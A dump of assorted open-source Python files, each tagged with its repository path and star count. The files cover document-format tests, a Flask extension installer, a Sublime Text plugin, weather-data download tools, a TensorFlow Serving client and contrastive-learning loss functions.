Produce text and html diff in files with `prefix_diff_files`
as prefix. The `text1_name` and `text2_name` arguments can
be used to label the two texts in the diff output files.
No files are produced if the texts are equal.
"""
if text1 == text2:
return False
# Else:
import difflib, time, os
text1_lines = text1.splitlines()
text2_lines = text2.splitlines()
diff_html = difflib.HtmlDiff().make_file(
text1_lines, text2_lines, text1_name, text2_name,
context=True, numlines=n)
diff_plain = difflib.unified_diff(
text1_lines, text2_lines, text1_name, text2_name, n=n)
filename_plain = prefix_diff_files + '.txt'
filename_html = prefix_diff_files + '.html'
f = open(filename_plain, 'w')
# Need to add newlines despite doc saying that trailing newlines are
# inserted...
diff_plain = [line + '\n' for line in diff_plain]
f.writelines(diff_plain)
f.close()
f = open(filename_html, 'w')
f.writelines(diff_html)
f.close()
return True
def assert_equal_text(text1, text2,
text1_name='text1', text2_name='text2',
prefix_diff_files='tmp_diff',
msg=''):
if msg != '' and msg[-1] not in ('.', '?', ':', ';', '!'):
msg += '.'
if msg != '':
msg += '\n'
msg += 'Load tmp_diff.html into a browser to see differences.'
assert not pydiff(text1, text2, text1_name, text2_name,
prefix_diff_files, n=3), msg
def assert_equal_files(file1, file2,
text1_name='text1', text2_name='text2',
prefix_diff_files='tmp_diff',
msg=''):
text1 = open(file1, 'r').read()
text2 = open(file2, 'r').read()
assert_equal_text(text1, text2,
text1_name=file1, text2_name=file2,
prefix_diff_files=prefix_diff_files,
msg=msg)
# ---- Here goes the tests -----
def test_mintest_html():
filename = '_ref_mintest_bluegray'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format html %s --html_style=bootstrap_bluegray --html_output=%s' % (filename, filename)
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
cmd = 'doconce split_html %s.html' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.html'] + ['._%s%03d.html' % (filename, i)
for i in range(4)]
for filename in filenames:
assert_equal_files(filename,
os.path.join('mintest', filename))
print('------- end of html test ------------')
def test_mintest_latex():
filename = '_ref_mintest'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format pdflatex %s --latex_code_style=vrb' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.tex']
for filename in filenames:
assert_equal_files(filename, os.path.join('mintest', filename))
print('------- end of latex test ------------')
def test_mintest_plain():
filename = '_ref_mintest'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format plain %s' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.txt']
for filename in filenames:
assert_equal_files(filename, os.path.join('mintest', filename))
print('------- end of plain text test ------------')
def test_mintest_ipynb():
filename = '_ref_mintest'
shutil.copy('mintest.do.txt', filename + '.do.txt')
cmd = 'doconce format ipynb %s' % filename
failure = os.system(cmd)
if failure:
assert False, 'Could not run %s' % cmd
filenames = [filename+'.ipynb']
for filename in filenames:
assert_equal_files(filename, os.path.join('mintest', filename))
print('------- end of plain text test ------------')
if __name__ == '__main__':
test_mintest_html()
test_mintest_latex()
test_mintest_plain()
test_mintest_ipynb()
| 4,810 |
lib/helper.py
|
vane/static-site-generator
| 0 |
2173185
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import lib.config
import urllib.parse
class FunctionHelper:
@staticmethod
def join(a, b=','):
return b.join(a)
@staticmethod
def relative_url(a):
return lib.config.Config.CONFIG['baseurl']+a
@staticmethod
def replace(a, b, c):
return a.replace(b, c)
@staticmethod
def escape(a):
return urllib.parse.quote(a)
@staticmethod
def cgi_escape(a):
return a
@staticmethod
def date(a, b):
return a.strftime(b)
@staticmethod
def truncatewords(a, b):
return ' '.join(''.join(a).split(' ')[:b])+'...'
@staticmethod
def highlight(*args, **kwargs):
return ''
def get_helpers():
method_list = [func for func in dir(FunctionHelper) if callable(getattr(FunctionHelper, func)) and not func.startswith('__')]
helpers = {}
for key in method_list:
helpers[key] = getattr(FunctionHelper, key)
return helpers
def write_file(path, data):
with open(path, 'wb') as f:
f.write(data.encode('utf-8'))
def read_file(path):
with open(path) as f:
data = f.read()
return data
def makedirs(path):
os.makedirs(path, exist_ok=True)
def join_path(path, *paths):
return os.path.join(path, *paths)
def strip_tags(data):
return re.sub('<[^<]+?>', '', data).strip()
| 1,400 |
fffw/encoding/__init__.py
|
tumb1er/fffw
| 4 |
2172225
|
from .codecs import *
from .ffmpeg import *
from .filters import *
from .inputs import *
from .outputs import *
| 112 |
model/bisenet/cityscapes.bisenet.R18.speed/onnx2trt.py
|
windyrobin/TorchSeg
| 3 |
2172799
|
# encoding=utf8
# install tensorrt 4.0 first
# tar -xzvf TensorRT-xxxx.Ubuntu-16.04.3.cuda-9.0.tar.gz
# add TensorRT-xxx/lib to bashrc
# sudo pip install the tensorrt-xxx-cp27-cp27mu-linux_x86_64.whl in uff folder
# sudo pip install the whl in graphsurgeon folder
# sudo pip install the whl in python folder
from __future__ import print_function
import sys
import json
import os
import common
import tensorrt as trt
import onnx
#from tensorrt.parsers import uffparser
#import pycuda.driver as cuda
#trt5
TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
#trt4
#G_LOGGER = trt.infer.ConsoleLogger(trt.infer.LogSeverity.ERROR)
def build_engine(model_file):
# For more information on TRT basics, refer to the introductory samples.
#parser = uffparser.create_uff_parser()
with trt.Builder(TRT_LOGGER) as builder, builder.create_network() as network, trt.OnnxParser(network, TRT_LOGGER) as parser:
# Parse the Uff Network
builder.max_workspace_size = common.GiB(2)
with open(model_file, 'rb') as model:
parser.parse(model.read())
print('parser errors: ', parser.num_errors)
for i in range(parser.num_errors):
err = parser.get_error(i)
print(err)
tensor = network.get_input(0)
print(tensor.name)
print(tensor.shape)
print("layers: %d".format(network.num_layers))
print("inputs: %d".format(network.num_inputs))
print("outputs: %d".format(network.num_outputs))
##network.mark_output(network.get_layer(network.num_layers - 1).get_output(0))
return builder.build_cuda_engine(network)
if __name__=='__main__':
model = onnx.load('./bisenet.onnx')
# Check that the IR is well formed
#onnx.checker.check_model(model)
# Print a human readable representation of the graph
#onnx.helper.printable_graph(model.graph)
engine = build_engine('./bisenet.onnx')
# Build an engine, allocate buffers and create a stream.
# For more information on buffer allocation, refer to the introductory samples.
#inputs, outputs, bindings, stream = allocate_buffers(engine)
#context = engine.create_execution_context()
| 2,186 |
reamber/algorithms/convert/SMToOsu.py
|
Bestfast/reamberPy
| 0 |
2173290
|
from typing import List
from reamber.base.Bpm import Bpm
from reamber.osu.OsuBpm import OsuBpm
from reamber.osu.OsuHit import OsuHit
from reamber.osu.OsuHold import OsuHold
from reamber.osu.OsuMap import OsuMap
from reamber.osu.lists.OsuBpmList import OsuBpmList
from reamber.osu.lists.OsuNotePkg import OsuNotePkg
from reamber.osu.lists.notes.OsuHitList import OsuHitList
from reamber.osu.lists.notes.OsuHoldList import OsuHoldList
from reamber.sm.SMMapSet import SMMapSet, SMMap
class SMToOsu:
OFFSET = 68
@staticmethod
def convert(sm: SMMapSet) -> List[OsuMap]:
""" Converts a SMMapset to possibly multiple osu maps
Note that a mapset contains maps, so a list would be expected.
SMMap conversion is not possible due to lack of SMMapset Metadata
:param sm:
:return:
"""
# I haven't tested with non 4 keys, so it might explode :(
osuMapSet: List[OsuMap] = []
for smMap in sm.maps:
assert isinstance(smMap, SMMap)
hits: List[OsuHit] = []
holds: List[OsuHold] = []
# Note Conversion
for hit in smMap.notes.hits():
hits.append(OsuHit(offset=hit.offset, column=hit.column))
for hold in smMap.notes.holds():
holds.append(OsuHold(offset=hold.offset, column=hold.column, _length=hold.length))
bpms: List[Bpm] = []
# Timing Point Conversion
for bpm in smMap.bpms:
bpms.append(OsuBpm(offset=bpm.offset, bpm=bpm.bpm))
# Extract Metadata
osuMap = OsuMap(
backgroundFileName=sm.background,
title=sm.title,
titleUnicode=sm.titleTranslit,
artist=sm.artist,
artistUnicode=sm.artistTranslit,
audioFileName=sm.music,
creator=sm.credit,
version=f"{smMap.difficulty} {smMap.difficultyVal}",
previewTime=int(sm.sampleStart),
bpms=OsuBpmList(bpms),
notes=OsuNotePkg(hits=OsuHitList(hits),
holds=OsuHoldList(holds))
)
osuMapSet.append(osuMap)
return osuMapSet
| 2,257 |
pp/util.py
|
mdawso04/pandas-plotly
| 0 |
2172735
|
import pandas as pd
from pathlib import Path
from pp.log import logger
from inspect import signature
#from types import MappingProxyType
from collections import OrderedDict
#SERVICES DIRECTORY
SERVICES = {}
#SERVICE KEYS
# type, number of selections possible
OPTION_FIELD_SINGLE_COL_ANY = (None, 1)
OPTION_FIELD_MULTI_COL_ANY = (None, None)
OPTION_FIELD_SINGLE_COL_NUMBER = ('number', 1)
OPTION_FIELD_MULTI_COL_NUMBER = ('number', None)
OPTION_FIELD_SINGLE_COL_STRING = ('object', 1)
OPTION_FIELD_MULTI_COL_STRING = ('object', None)
OPTION_FIELD_SINGLE_BOOLEAN = ('boolean', 1)
OPTION_FIELD_SINGLE_COLORSWATCH = ('colorswatch', 1)
OPTION_FIELDS = []
OPTION_FIELDS.extend([
OPTION_FIELD_SINGLE_COL_ANY,
OPTION_FIELD_MULTI_COL_ANY,
OPTION_FIELD_SINGLE_COL_NUMBER,
OPTION_FIELD_MULTI_COL_NUMBER,
OPTION_FIELD_SINGLE_COL_STRING,
OPTION_FIELD_MULTI_COL_STRING,
OPTION_FIELD_SINGLE_BOOLEAN,
OPTION_FIELD_SINGLE_COLORSWATCH,
])
FIELD_STRING = 'string'
FIELD_INTEGER = 'int'
FIELD_NUMBER = 'number'
FIELD_FLOAT = 'float'
class Service(object):
def __init__(self, fn, d):
self.name = fn.__name__
self.fn = fn
self._d = d
def options(self, df):
#TODO: orderedDict
return {k: (colHelper(df, type=v[0], colsOnNone=True) if v in OPTION_FIELDS else None) for k, v in self._d.items()}
def registerService(**d):
def inner(fn):
def service_group(service_name):
gr = extractGroup(service_name)
if gr not in SERVICES.keys():
SERVICES[gr] = {}
return SERVICES[gr]
service_group(fn.__name__)[fn.__name__] = Service(fn, d)
logger.debug('pp.util > registerService: Registered Service: {}'.format(fn.__name__))
return fn
return inner
# ## UTILITIES ###
def service_helper(groups=None, return_type='group_service_callable'):
if isinstance(groups, str):
groups = [groups]
elif isinstance(groups, list):
groups = groups
else:
groups = None
if groups is None:
filtered_services = SERVICES
else:
filtered_services = {g: SERVICES[g] for g in groups if g in SERVICES.keys()}
if return_type=='group_service_callable':
return filtered_services
elif return_type=='group_service_names':
return {k: list(v.keys()) for k, v in filtered_services.items()}
elif return_type=='service_callable':
return {k: v for dic in filtered_services.values() for k, v in dic.items()}
return "SERVICE NOT FOUND"
def extractGroup(service):
if not isinstance(service, str):
return None
return service.split('_', 1)[0].lower()
def removeElementsFromList(l1, l2):
'''Remove from list1 any elements also in list2'''
# if not list type ie string then covert
if not isinstance(l1, list):
list1 = []
list1.append(l1)
l1 = list1
if not isinstance(l2, list):
list2 = []
list2.append(l2)
l2 = list2
return [i for i in l1 if i not in l2]
def commonElementsInList(l1, l2):
if l1 is None or l2 is None: return None
if not isinstance(l1, list): l1 = [l1]
if not isinstance(l2, list): l2 = [l2]
return [i for i in l1 if i in l2]
def colHelper(df, columns=None, max=None, type=None, colsOnNone=True, forceReturnAsList=True):
if isinstance(columns, tuple):
columns = list(columns)
# pre-process: translate to column names
if isinstance(columns, slice) or isinstance(columns, int):
columns = df.columns.values.tolist()[columns]
elif isinstance(columns, list) and all(isinstance(c, int) for c in columns):
columns = df.columns[columns].values.tolist()
# process: limit possible columns by type (number, object, datetime)
df1 = df.select_dtypes(include=type) if type is not None else df
#process: fit to limited column scope
if colsOnNone == True and columns is None: columns = df1.columns.values.tolist()
elif columns is None: return None
else: columns = commonElementsInList(columns, df1.columns.values.tolist())
# apply 'max' check
if isinstance(columns, list) and max != None:
if max == 1: columns = columns[0]
else: columns = columns[:max]
# if string format to list for return
if forceReturnAsList and not isinstance(columns, list):
columns = [columns]
return columns
def colValues(df, col):
cv = df[col].unique()
return cv
def toMultiIndex(df):
if isinstance(df.columns, pd.MultiIndex):
arrays = [range(0, len(df.columns)), df.columns.get_level_values(0), df.dtypes]
mi = pd.MultiIndex.from_arrays(arrays, names=('Num', 'Name', 'Type'))
else:
arrays = [range(0, len(df.columns)), df.columns, df.dtypes]
mi = pd.MultiIndex.from_arrays(arrays, names=('Num', 'Name', 'Type'))
df.columns = mi
return df
def toSingleIndex(df):
if isinstance(df.columns, pd.MultiIndex):
df.columns = df.columns.get_level_values(1)
return df
def rowHelper(df, max = None, head = True):
if max is None: return df
else:
if head is True: return df.head(max)
else: return df.tail(max)
def toUniqueColName(df, name):
n = 1
name = str(name)
while name in df.columns.values.tolist():
name = name + '_' + str(n)
return name
def pathHelper(path, filename):
import os
if path == None:
home = str(pathlib.Path.home())
path = os.path.join(home, 'report')
else:
path = os.path.join(path, 'report')
os.makedirs(path, exist_ok = True)
path = os.path.join(path, filename)
return path
| 5,687 |
src/flask_batteries/installers/base_installer.py
|
graydenshand/flask_boot
| 1 |
2172855
|
import click
import os
import subprocess
import re
import sys
from ..config import PATH_TO_VENV, TAB
from ..helpers import *
class FlaskExtInstaller:
package_name = None
imports = []
inits = []
attachments = []
shell_vars = []
decorators = []
base_config = {}
production_config = {}
development_config = {}
testing_config = {}
pypi_dependencies = []
envs = {}
@classmethod
def install(cls):
# Prevent installing same package twice
if cls.verify():
raise InstallError(f"{cls.package_name} is already installed")
# Install package from PyPI
if cls.package_name is not None:
subprocess.run(
[pip(), "install", "-q", "-q", cls.package_name]
+ cls.pypi_dependencies,
stdout=subprocess.DEVNULL,
)
subprocess.run(
f"{pip()} freeze -q -q > requirements.txt",
stdout=subprocess.DEVNULL,
shell=True,
)
# Edit __init__.py
add_to_init(
imports=cls.imports,
initializations=cls.inits,
attachments=cls.attachments,
shell_vars=cls.shell_vars,
decorators=cls.decorators,
)
# Edit config.py
add_to_config(
base_config=cls.base_config,
production_config=cls.production_config,
development_config=cls.development_config,
testing_config=cls.testing_config,
)
# Add envs
set_env_vars(**cls.envs)
@classmethod
def uninstall(cls):
if cls.package_name is not None:
# Uninstall package from PyPI
subprocess.run(
[pip(), "uninstall", "-q", "-q", "-y", cls.package_name]
+ cls.pypi_dependencies,
stdout=subprocess.DEVNULL,
)
subprocess.run(
f"{pip()} freeze -q -q > requirements.txt",
stdout=subprocess.DEVNULL,
shell=True,
)
# Remove initialization from __init__.py and create_app() func
lines_to_remove = (
cls.imports + cls.inits + cls.attachments + cls.shell_vars + cls.decorators
)
remove_from_file(os.path.join("src", "__init__.py"), lines_to_remove)
# Edit config.py
lines_to_remove = (
list(cls.base_config.keys())
+ list(cls.production_config.keys())
+ list(cls.development_config.keys())
+ list(cls.testing_config.keys())
)
remove_from_file(os.path.join("src", "config.py"), lines_to_remove)
# Remove env vars
rm_env_vars(**cls.envs)
@classmethod
def verify(cls, raise_for_error=False):
# Verify package is istalled from PyPI
if cls.package_name is not None:
reqs = subprocess.check_output(f"{pip()} freeze -q -q", shell=True)
installed_packages = [
r.decode().split("==")[0].lower() for r in reqs.split()
]
if cls.package_name.lower() not in installed_packages:
if raise_for_error:
raise InstallError(f"{cls.package_name} not installed from PyPI")
return False
# Verify __init__.py
lines_to_verify = (
cls.imports + cls.inits + cls.attachments + cls.shell_vars + cls.decorators
)
if not verify_file(
os.path.join("src", "__init__.py"), lines_to_verify, raise_for_error=True
):
return False
# Verify config.py
lines_to_verify = (
list(cls.base_config.keys())
+ list(cls.production_config.keys())
+ list(cls.development_config.keys())
+ list(cls.testing_config.keys())
)
if not verify_file(
os.path.join("src", "config.py"),
lines_to_verify,
raise_for_error=raise_for_error,
):
return False
# Verify ENVS
with open(activate(), "r") as f:
body = f.read()
for k, v in cls.envs.items():
pattern = rf"(use|export) {k}=(.*)\n"
if re.search(pattern, body) is None:
if raise_for_error:
raise InstallError(f"{cls} ENVs missing from venv activate")
return False
return True
| 4,485 |
OpenInSourceTree.py
|
voidius/sublime-open-in-sourcetree
| 1 |
2172961
|
import os
import locale
import subprocess
import sublime, sublime_plugin
class OpenInSourcetreeCommand(sublime_plugin.WindowCommand):
FALLBACK_STREE_PATH = '/usr/local/bin/stree'
FALLBACK_STREE_MAC_PATH = '/Applications/SourceTree.app'
settings = sublime.load_settings('OpenInSourceTree.sublime-settings')
def run(self, *args):
sublime.status_message(__name__ + ': running')
stree_path = self.get_stree_path()
path = self.get_path()
if path in ['', None]:
sublime.status_message(__name__ + ': No place to open SourceTree to')
return False
if stree_path in ['', None]:
sublime.error_message(__name__ + ': No SourceTree executable found: is it installed?')
return False
if self.settings.get('detect_git', True):
path = self.get_git_path(path)
if stree_path.endswith(".app"):
subprocess.call(['open', '-a', stree_path, path])
else:
subprocess.Popen([stree_path], cwd=path.encode(locale.getpreferredencoding(do_setlocale=True)), shell=True)
def get_git_path(self, initial_path):
git_path = initial_path
while ('.git' not in os.listdir(git_path)) and (git_path != '/'):
git_path = os.path.dirname(git_path)
if git_path != '/':
return git_path
else:
return initial_path
def get_path(self):
if self.window.active_view():
path = self.window.active_view().file_name()
elif self.window.folders():
path = self.window.folders()[0]
else:
return None
if os.path.isfile(path):
path = os.path.dirname(path)
return path
def get_stree_path(self):
stree_path = self.settings.get('stree_path', self.FALLBACK_STREE_PATH)
if stree_path == None:
stree_path = self.FALLBACK_STREE_PATH
if not os.path.isfile(stree_path):
mac_path = self.FALLBACK_STREE_MAC_PATH
if os.path.isdir(mac_path):
stree_path = mac_path
else:
stree_path = None
return stree_path
| 2,200 |
src/dyncommands/exceptions.py
|
Cubicpath/dyncommands
| 1 |
2173235
|
###################################################################################################
# MIT Licence (C) 2022 Cubicpath@Github #
###################################################################################################
"""Exceptions raised during parsing."""
from typing import Optional
from .models import *
__all__ = (
'CommandError',
'DisabledError',
'ImproperUsageError',
'NoPermissionError',
'NotFoundError',
'UnrestrictedWarning',
)
class UnrestrictedWarning(UserWarning):
"""Warns when commands will be run as unrestricted."""
class CommandError(Exception):
"""General exception for :py:class:`Node` execution."""
def __init__(self, command: Optional[Node], context: CommandContext, parent: Exception = None, message: str = None) -> None:
self.command: Optional[Node] = command
self.context: CommandContext = context
self.parent: Exception = parent
name = command.name if command else 'Unknown'
super().__init__(f"'{context.source.display_name}' failed executing the '{name}' command." if message is None else message)
class DisabledError(CommandError):
"""Error when attempting to execute a disabled :py:class:`Node`."""
def __init__(self, command: Node, context: CommandContext) -> None:
super().__init__(command, context, self, f"'{command.name}' is disabled, enable to execute.")
class ImproperUsageError(CommandError):
"""Error for when a :py:class:`Node` is improperly used (manually triggered by :py:class:`Node`)."""
def __init__(self, command: Node, context: CommandContext, message: str = None) -> None:
super().__init__(command, context, self, f"Incorrect usage of '{command.name}'. To view usage information, use '!#prefix#!help "
f"{command.name}'." if message is None else message)
class NoPermissionError(CommandError):
"""Error for attempting to execute a :py:class:`Node` without required permissions."""
def __init__(self, command: Node, context: CommandContext) -> None:
super().__init__(command, context, self, f"'{context.source.display_name}' did not have the required permissions "
f"({context.source.permission}/{command.permission}) to use the '{command.name}' command.")
class NotFoundError(CommandError):
"""Error executing a non-existent :py:class:`Node` name."""
def __init__(self, name: str, context: CommandContext) -> None:
super().__init__(None, context, self, f"'{name}' is not a registered command.")
| 2,677 |
Ago-Dic-2019/Luis Llanes/Practica1/ejercicio4-5.py
|
Arbupa/DAS_Sistemas
| 41 |
2173006
|
#Hacer una lista del 1 al 1,000,000 y despues usar min y max para verificar
listanumeros=[]
for i in range(0,1000000):
listanumeros.append(i+1)
print("Numero menor:", min(listanumeros))
print("Numero mayor:", max(listanumeros))
print("Suma de todos:", sum(listanumeros))
#pues el resultado arrojado por sum es casi instantaneo, 500000500000
| 348 |
herbie/tools.py
|
gitter-badger/Herbie
| 0 |
2170700
|
## <NAME>
## May 3, 2021
"""
============
Herbie Tools
============
"""
from datetime import datetime, timedelta
import pandas as pd
import xarray as xr
from herbie.archive import Herbie
def bulk_download(
DATES,
searchString=None,
*,
fxx=range(0, 1),
model="hrrr",
product="sfc",
priority=None,
verbose=True,
):
"""
Bulk download GRIB2 files from file source to the local machine.
Iterates over a list of datetimes (DATES) and forecast lead times (fxx).
Parameters
----------
DATES : list
List of datetimes
searchString : None or str
If None, download the full file. If string, use regex to search
index files for variables and levels of interest and only
download the matched GRIB messages.
fxx : int or list
List of forecast lead times to download. Default only downloads model analysis.
model : {'hrrr', 'hrrrak', 'rap'}
Model to download.
product : {'sfc', 'prs', 'nat', 'subh'}
Variable products file to download. Not needed for RAP model.
"""
if isinstance(DATES, (str, pd.Timestamp)) or hasattr(DATES, "strptime"):
DATES = [DATES]
if isinstance(fxx, int):
fxx = [fxx]
kw = dict(model=model, product=product)
if priority is not None:
kw["priority"] = priority
# Locate the file sources
print("👨🏻🔬 Check which requested files exists")
grib_sources = [Herbie(d, fxx=f, **kw) for d in DATES for f in fxx]
loop_time = timedelta()
n = len(grib_sources)
print("\n🌧 Download requested data")
for i, g in enumerate(grib_sources):
timer = datetime.now()
g.download(searchString=searchString)
# ---------------------------------------------------------
# Time keeping: *crude* method to estimate remaining time.
# ---------------------------------------------------------
loop_time += datetime.now() - timer
mean_dt_per_loop = loop_time / (i + 1)
remaining_loops = n - i - 1
est_rem_time = mean_dt_per_loop * remaining_loops
if verbose:
print(
f"🚛💨 Download Progress: [{i+1}/{n} completed] >> Est. Time Remaining {str(est_rem_time):16}\n"
)
# ---------------------------------------------------------
requested = len(grib_sources)
completed = sum([i.grib is None for i in grib_sources])
print(f"🍦 Done! Downloaded [{completed}/{requested}] files. Timer={loop_time}")
return grib_sources
def xr_concat_sameRun(DATE, searchString, fxx=range(0, 18)):
"""
Load and concatenate xarray objects by forecast lead time for the same run.
Parameters
----------
DATE : pandas-parsable datetime
A datetime that represents the model initialization time.
searchString : str
Variable fields to load. This really only works if the search
string returns data on the same hyper cube.
fxx : list of int
List of forecast lead times, in hours, to concat together.
"""
Hs_to_cat = [Herbie(DATE, fxx=f).xarray(searchString) for f in fxx]
return xr.concat(Hs_to_cat, dim="f")
def xr_concat_sameLead(DATES, searchString, fxx=0, DATE_is_valid_time=True):
"""
Load and concatenate xarray objects by model initialization date for the same lead time.
Parameters
----------
DATES : list of pandas-parsable datetime
Datetime that represents the model valid time.
searchString : str
Variable fields to load. This really only works if the search
string returns data on the same hyper cube.
fxx : int
The forecast lead time, in hours.
"""
Hs_to_cat = [
Herbie(DATE, fxx=fxx, DATE_is_valid_time=DATE_is_valid_time).xarray(
searchString
)
for DATE in DATES
]
return xr.concat(Hs_to_cat, dim="t")
| 3,905 |
generatepdf417/pdf147.py
|
john526/codePython
| 0 |
2172993
|
from pdf417 import render_image,render_svg, encode
from message import director
def generatepdf417():
enc = encode(director, columns=15, security_level=7)
name_417 = "first417.jpg"
image_render = render_image(enc)
image_render.show()
image_render.save(name_417)
| 286 |
setup.py
|
gboehl/emcwrap
| 0 |
2166302
|
from setuptools import setup, find_packages
from os import path
# read the contents of the README file
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, "README.rst"), encoding="utf-8") as f:
long_description = f.read()
setup(
long_description=long_description,
long_description_content_type="text/x-rst",
url="https://github.com/gboehl/emcwrap",
name="emcwrap",
version="0.1.2",
author="<NAME>",
author_email="<EMAIL>",
description="Tools for Bayesian inference using Ensemble MCMC",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
],
include_package_data=True,
packages=find_packages(),
install_requires=[
"numpy",
"scipy",
"tqdm",
"emcee",
"pandas",
"numdifftools",
"matplotlib",
"grgrlib>=0.1.3",
],
)
| 1,003 |
AIDog/serving/test_client.py
|
BaranovArtyom/aiexamples
| 119 |
2173325
|
#!/usr/bin/env python
import argparse
import requests
import json
import tensorflow as tf
import numpy as np
import base64
def load_labels(label_file):
label = []
proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
for l in proto_as_ascii_lines:
label.append(l.rstrip())
return label
if __name__ == "__main__":
file_name = "n02085620_199.png"
label_file = "dog_labels_inception_v3.txt"
model_name = "default"
model_version = 2
enable_ssl = False
parser = argparse.ArgumentParser()
parser.add_argument("--image", help="image to be processed")
parser.add_argument("--labels", help="name of file containing labels")
parser.add_argument("--model_name", help="name of predict model")
parser.add_argument("--model_version", type=int, help="version of predict model")
parser.add_argument("--enable_ssl", type=bool, help="if use https")
args = parser.parse_args()
if args.image:
file_name = args.image
if args.labels:
label_file = args.labels
if args.model_name:
model_name = args.model_name
if args.enable_ssl:
enable_ssl = args.enable_ssl
with open(file_name, "rb") as image_file:
encoded_string = str(base64.urlsafe_b64encode(image_file.read()), "utf-8")
if enable_ssl :
endpoint = "https://127.0.0.1:8500"
else:
endpoint = "http://127.0.0.1:8500"
json_data = {"model_name": model_name,
"model_version": model_version,
"data": {"image": encoded_string}
}
result = requests.post(endpoint, json=json_data)
res = np.array(json.loads(result.text)["prediction"][0])
print(res)
indexes = np.argsort(-res)
labels = load_labels(label_file)
top_k = 3
for i in range(top_k):
idx = indexes[i]
print(labels[idx], res[idx])
| 1,772 |
api/validators/regx/regex_user.py
|
oso1248/budAPI
| 0 |
2173230
|
import re
# Limits to 8 characters minimun, Uppercase, Lowercase, Number, Special Character [#?!@$%^&*-]
user_password_regex = re.compile(
r'^(?=.*?[A-Z])(?=.*?[a-z])(?=.*?[0-9])(?=.*?[#?!@$%^&*-]).{8,}$')
# Limits to list
user_role_regex = re.compile(
r'\b(Admin|Brew Master|Assist Brew Master|BPM|PE Brewhouse|PE Finishing|Maintenance|Material Handler|Lead Brewer|Brewer|Apprentice|Weekender|Seasonal)\b')
# Limits to FTC
user_brewery_regex = re.compile(
r'\b(FTC)\b')
# Limits to Alphanumeric characters, 5-50 characters in length
user_name_regex = re.compile(r'^[a-zA-Z0-9\x20]{5,50}$')
# Limits to Alphanumeric characters, 5-50 characters in length, no spaces
user_username_regex = re.compile(r'^[a-zA-Z0-9]{5,50}$')
| 741 |
tests/test_style.py
|
LaudateCorpus1/windlass
| 4 |
2170786
|
#
# (c) Copyright 2017 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Until PEP8 would become seprate test job this should permit running multiple
# tests at same time.
from flake8 import engine
from io import StringIO
import sys
import testtools
from testtools.matchers import Never
class Test_Style(testtools.TestCase):
def test_flake8(self):
try:
oldout = sys.stdout
sys.stdout = StringIO()
style_guide = engine.get_style_guide(exclude=['build'])
report = style_guide.check_files('.')
if report.total_errors > 0:
for line in sys.stdout.getvalue().split('\n'):
if line:
self.expectThat('', Never(), line)
finally:
sys.stdout = oldout
| 1,333 |
ride/BySykkelOnline.py
|
daria-for-origo/BySykkel
| 0 |
2173191
|
import traceback
from urllib.request import Request, urlopen
from ride.BySykkelError import print_exception, print_error
'''
https://oslobysykkel.no/apne-data/sanntid
Identifikasjon i header
Alle spørringer til vårt sanntids-API bør sende headeren Client-Identifier.
Denne bør inneholde en verdi som beskriver applikasjonen som kaller APIet.
Verdien bør inneholde navnet på ditt firma/organisasjon,
deretter en strek og navn på applikasjonen,
som mittfirma-reiseplanlegger eller mittfirma-bymonitor.
'''
def get_content(url, client_id):
if client_id == "":
print_error("Mandatory parameter Client-ID is missing")
return "{}"
if len(client_id) < 7:
print_error("Client-ID is too short")
return "{}"
try:
req = Request(url)
req.add_header('Client-Identifier', client_id)
return urlopen(req).read()
except Exception as ex:
ex.args += (url,)
print_exception(ex, traceback.format_exc())
return "{}"
| 1,005 |
model/architectures/losses.py
|
ratschlab/ncl
| 7 |
2173000
|
import gin
import tensorflow as tf
# NCE Contrastive Losses
@gin.configurable("momentum_NT_X")
def Momentum_NT_X(features, temperature=1.0):
q, queue = features
N = tf.shape(q)[0]
C = tf.shape(queue)[1]
k = queue[:N] # The first N elememts of the queue correspond to the positive views.
# Compute positives
l_pos = tf.matmul(tf.reshape(q, [N, 1, C]), tf.reshape(k, [N, C, 1]))
l_pos = tf.reshape(l_pos, [N, 1])
# Compute normalization
logits = tf.matmul(q, tf.transpose(queue))
labels = tf.range(N, dtype=tf.int32) # Meta-labels for the contrastive accuracy
expectations_marginal_per_sample = tf.reduce_logsumexp(logits / temperature, axis=1)
joint_expectation = tf.reduce_sum(l_pos, axis=1) / temperature
X_ent_per_sample = joint_expectation - expectations_marginal_per_sample
loss = - tf.reduce_mean(X_ent_per_sample, axis=0)
# Computing the contrastive accuracy
preds = tf.transpose(tf.argmax(tf.squeeze(logits), axis=1, output_type=tf.int32))
correct_preds = (preds == labels)
accuracy = tf.reduce_mean(tf.cast(tf.expand_dims(correct_preds, axis=0), tf.float32), axis=1)[0]
return loss, accuracy
@gin.configurable("momentum_neighbors_NT_X")
def Momentum_Neighbors_NT_X(features, n_labels_queues, temperature=1.0, alpha=0.5, neigh_func=gin.REQUIRED):
"""
Neighborhood contrastive loss used with Momentum queue as : https://arxiv.org/abs/1911.05722
Args:
features: Tuple of the form (projections, queue)
n_labels_queues: Tensor with matching labels to the momentum queue.
temperature: Float with temperature scaling parameter.
alpha: Float with trade-off parameter between inter and intra-neighborhood learning.
neigh_func: function used to define neigborhoods.
Returns:
loss: Global loss term.
aggregation_loss: Neighbors aggregation term.
disc_loss: Neighbors discrimation term.
accuracy: Contrastive accuracy.
"""
q, queue = features
N = tf.shape(q)[0]
C = tf.shape(queue)[1]
k = queue[:N]
n_l = n_labels_queues[:N]
